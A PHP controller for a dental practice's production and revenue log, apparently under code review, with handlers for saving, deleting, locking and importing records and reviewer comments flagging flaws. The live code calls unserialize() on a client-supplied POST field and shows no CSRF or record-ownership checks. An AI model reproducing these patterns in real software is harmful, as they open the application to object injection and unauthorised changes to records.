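<?php
/* Delvin Dev Production */

/*
 * Page controller for the production (revenue) log.
 *
 * Reads $_POST['submitBut'] / $_POST['action'] to decide which state change to
 * perform (save, delete, undelete, lock, import) and then which view to load.
 *
 * NOTE(review): no anti-CSRF token check and no per-record ownership check are
 * visible in this file. Every handler below acts on a client-supplied revID, so
 * confirm that ini.php and the Revenue methods enforce both.
 */
include('ini.php');

$Template = new Template;
$Revenue = new Revenue;

// Session gate: anyone without a positive login ID is sent to the login page.
// NOTE(review): confirm Template::redirect() terminates the request. If it only
// sends a Location header, every POST handler below still runs for an
// unauthenticated client.
if ((isset($_SESSION['LID']) && $_SESSION['LID'] <= 0) || !isset($_SESSION['LID'])) {
    $Template->redirect("index.php");
}

// Default the two dispatch fields so the comparisons below never hit an undefined index.
if (!isset($_POST['submitBut'])) {
    $_POST['submitBut'] = '';
}
if (!isset($_POST['action'])) {
    $_POST['action'] = '';
}

date_default_timezone_set($_SESSION['timeZone']);

$result = '';
if (isset($_POST['f_start']) && isset($_POST['f_end']) && strtotime($_POST['f_start']) > strtotime($_POST['f_end'])) {
    $result = 'ERROR: Please select a logical date range.';
}

// revID is client-controlled and is echoed back inside alert messages, so build
// an HTML-escaped copy once and use only that copy for display.
$revID_html = htmlspecialchars(
    (isset($_POST['revID']) && is_scalar($_POST['revID'])) ? (string) $_POST['revID'] : '',
    ENT_QUOTES,
    'UTF-8'
);

// UPDATE THE DATABASE
$error = FALSE;

if ($_POST['submitBut'] == 'Save') {
    // The producer field arrives as "producerID|dentistID|PMS_ID"; pad to three
    // parts so a short value yields empty strings instead of undefined offsets.
    $ID_arr = array_pad(explode('|', $_POST['producerID']), 3, '');
    $producerID = intval($ID_arr[0]);
    $dentistID = intval($ID_arr[1]);
    $PMS_ID = $ID_arr[2];

    if ($_POST['date'] == '') {
        $error = TRUE;
        $Template->set_alert("ERROR: The form is missing some required information. -" . __line__ , "error");
    } else if ($producerID === 0 || $dentistID === 0) {
        // intval() always returns an int. The previous `== ''` test only matched 0
        // on PHP < 8; on PHP 8 `0 == ''` is false and an unlinked producer slipped through.
        $error = TRUE;
        $Template->set_alert("ERROR: The producer has not been linked to their producer ID in DELVIN. Please contact support.", "error");
    } else {
        // write to database
        $undelete = isset($_POST['undelete']) ? $_POST['undelete'] : '';
        $deleted = '';
        if ($undelete == 'no') {
            $deleted = 'Y';
        } else if ($undelete == 'yes') {
            $deleted = "";
        }

        date_default_timezone_set($_SESSION['timeZone']);

        // check for duplicate
        if ($Revenue->conflict_chk($_POST['revID'], $producerID, $dentistID, strtotime($_POST['date']))) {
            $error = TRUE;
            $Template->set_alert("ERROR: An entry for the same producer, date & allocation exists. Duplicate entries are not permitted. \nPlease edit the existing entry.", "error");
        }

        if ($error == FALSE) {
            $Users = new Users;
            $uRow = $Users->search($_SESSION['PID'], $producerID, '', '', '', '', '', $_POST['startTS'], $_POST['endTS'], '', '', '');
            $jobAreaID = $uRow['jobAreaID'];

            // NOTE(review): the amounts are passed through unvalidated and the note is
            // HTML-escaped before storage rather than on output. Confirm add_mod()
            // uses bound parameters and that views do not escape the note a second time.
            if ($Revenue->add_mod(
                $_POST['revID'],
                $producerID,
                $dentistID,
                $PMS_ID,
                strtotime($_POST['date']),
                $_POST['amtProd'],
                $_POST['amtLab'],
                $_POST['amtProdAdjust'],
                $_POST['amtColl'],
                $_POST['amtCollAdjust'],
                $_POST['amtSales'],
                $_POST['netProd'],
                $_POST['netColl'],
                htmlspecialchars($_POST['note']),
                $jobAreaID,
                $deleted
            )) {
                $Template->set_alert('Production data saved.', 'success');
            } else {
                $Template->set_alert('ERROR: Production data was NOT saved.', 'error');
            }
        }
    }
} else if ($_POST['submitBut'] == 'Confirm Delete') {
    if ($Revenue->delete($_POST['revID'])) {
        $Template->set_alert('Production log item #' . $revID_html . " was deleted." , "success");
    } else {
        $Template->set_alert("ERROR: Production log item #" . $revID_html . " couldn't be deleted.", "error");
    }
} else if ($_POST['action'] == 'lock') {
    $Revenue->set_lock($_POST['revID'], $_POST['locked']);
} else if ($_POST['submitBut'] == 'Undelete') {
    if ($Revenue->undelete($_POST['revID'])) {
        $Template->set_alert('Production log #' . $revID_html . " was undeleted and will now appear in the the list of valid log entries", "success");
    } else {
        // The failure text previously read "was not deleted", copied from the delete branch.
        $Template->set_alert("ERROR: Production log #" . $revID_html . " was not undeleted.", "error");
    }
}

if ($_POST['submitBut'] == 'Upload File' && $_FILES['csv']['name'] == '') {
    $Template->set_alert('ERROR: Some required form data is missing', "error");
}

// IMPORT DATA FROM PMS
$import_success = true;
if ($_POST['submitBut'] == 'Import') {
    // SECURITY NOTE(review): unserialize() on a request field is PHP object injection
    // surface, and it also lets the client rewrite every row (IDs and amounts) after
    // the preview step. Prefer keeping the parsed rows server-side (session or temp
    // file) or round-tripping them as JSON with an integrity check. If unserialize()
    // must stay, pass ['allowed_classes' => false] (PHP >= 7.0).
    $import_data_arr = unserialize($_POST['data2_arr']);

    if (!is_array($import_data_arr)) {
        // A malformed payload makes unserialize() return false; stop here instead
        // of iterating and counting a non-array.
        $import_data_arr = array();
        $import_success = false;
        $Template->set_alert('ERROR: The import data could not be read.', 'error');
    } else {
        $result_count = 0;

        foreach ($import_data_arr as $key => $row) {
            if (!is_array($row)) {
                // Leave the entry in place so it is counted as a failed dataset below.
                continue;
            }

            $dateTS = strtotime($row['date'] . " 12:00 PM");

            // Fill in whichever of gross/net production is missing from the other
            // one and the adjustment.
            if ($row['amtProdAdjust'] > 0) {
                if ($row['amtProd'] <= 0) {
                    $import_data_arr[$key]['amtProd'] = $row['netProd'] + $row['amtProdAdjust'];
                } else if ($row['netProd'] <= 0) {
                    $import_data_arr[$key]['netProd'] = $row['amtProd'] - $row['amtProdAdjust'];
                }
            } else {
                if ($row['amtProd'] <= 0 && $row['netProd'] > 0) {
                    $import_data_arr[$key]['amtProd'] = $row['netProd'];
                } else if ($row['netProd'] <= 0 && $row['amtProd'] > 0) {
                    $import_data_arr[$key]['netProd'] = $row['amtProd'];
                }
            }

            // Same reconciliation for collections.
            if ($row['amtCollAdjust'] > 0) {
                if ($row['amtColl'] <= 0) {
                    $import_data_arr[$key]['amtColl'] = $row['netColl'] + $row['amtCollAdjust'];
                } else if ($row['netColl'] <= 0) {
                    $import_data_arr[$key]['netColl'] = $row['amtColl'] - $row['amtCollAdjust'];
                }
            } else {
                if ($row['amtColl'] <= 0 && $row['netColl'] > 0) {
                    $import_data_arr[$key]['amtColl'] = $row['netColl'];
                } else if ($row['netColl'] <= 0 && $row['amtColl'] > 0) {
                    $import_data_arr[$key]['netColl'] = $row['amtColl'];
                }
            }

            // === import data
            // NOTE(review): $row is the foreach copy, so the reconciled values written
            // to $import_data_arr[$key] above are NOT what gets imported here. Confirm
            // whether import() was meant to receive the reconciled row.
            if ($row['amtProd'] != 0 || $row['amtLab'] != 0 || $row['amtProdAdjust'] != 0 || $row['amtColl'] != 0 || $row['amtCollAdjust'] != 0 || $row['netProd'] != 0 || $row['netColl'] != 0) {
                if ($Revenue->import(
                    $row['revID'],
                    $row['producerID'],
                    $row['dentistID'],
                    $row['PMS_ID'],
                    $dateTS,
                    $row['amtProd'],
                    $row['amtLab'],
                    $row['amtProdAdjust'],
                    $row['amtColl'],
                    $row['amtCollAdjust'],
                    $row['netProd'],
                    $row['netColl'],
                    $row['jobAreaID']
                )) {
                    $result_count++;
                }
            } else {
                // All-zero rows are dropped and do not count as failures.
                unset($import_data_arr[$key]);
            }
        }

        if (count($import_data_arr) == $result_count) {
            $Template->set_alert('All data was imported successfully', 'success');
            $error = false;
            // Cleanup of the uploaded file is currently disabled. The filename is
            // client-supplied; basename() keeps the path inside the per-practice temp
            // directory should the unlink() ever be re-enabled.
            if (file_exists('temp/' . $_SESSION['PID'] . "/" . basename($_POST['filename']))) {
                // unlink('temp/'.$_SESSION['PID']."/".basename($_POST['filename']));
            }
        } else {
            $num_bad = count($import_data_arr) - $result_count;
            $result = 'ERROR: ' . $num_bad . " of the " . count($import_data_arr) . " datasets FAILED to import.";
            $import_success = false;
        }
    }
}

include('includes/private_header.php');

// DISPLAY ALERTS
echo $Template->get_alerts();

// SET VIEW
if ($_SESSION['LID']) {
    if ($_POST['submitBut'] == 'Add Manually'
        || $_POST['submitBut'] == 'Edit'
        || ($error == TRUE && $_POST['submitBut'] == 'Save')
        || ($_POST['submitBut'] == '' && $_POST['action'] != '' && $_POST['action'] != 'lock')
    ) {
        if ($_SESSION['PMS'] == 'Dentrix') {
            $Template->load('views/v_production_edit_Dentrix.php', 'Production');
        } else {
            $Template->load('views/v_production_edit.php', 'Production');
        }
    } else if ($_POST['submitBut'] == 'Import Data'
        // NOTE(review): nothing in the import path sets $error to true (a failed
        // import sets $import_success = false), so this clause looks unreachable.
        || ($_POST['submitBut'] == 'Import' && $error === true)
        || substr($_POST['submitBut'], 0, 6) == 'Upload'
        || $_POST['submitBut'] == 'Continue'
    ) {
        $Template->load("views/v_production_import.php", 'Production');
    } else if ($_POST['submitBut'] == 'Delete') {
        $Template->load('views/v_production_del.php', 'Production');
    } else if ($_POST['submitBut'] == 'Get Reports') {
        $Template->load('views/v_reportProduction.php');
    } else {
        if (isset($_POST['action']) && isset($_POST['prodID'])) {
            if ($_POST['prodID'] > 0 && $_POST['action'] == 'lock') {
                // NOTE(review): $Production is never assigned in this file; unless an
                // included file defines it, this call fails on an undefined variable.
                $Production->set_lock($_POST['prodID']);
            }
        }
        // display list of staff production
        $Template->load('views/v_production.php', 'Production');
    }
} else {
    include('views/v_sess_exp.php');
}

include('includes/private_footer.php');
?>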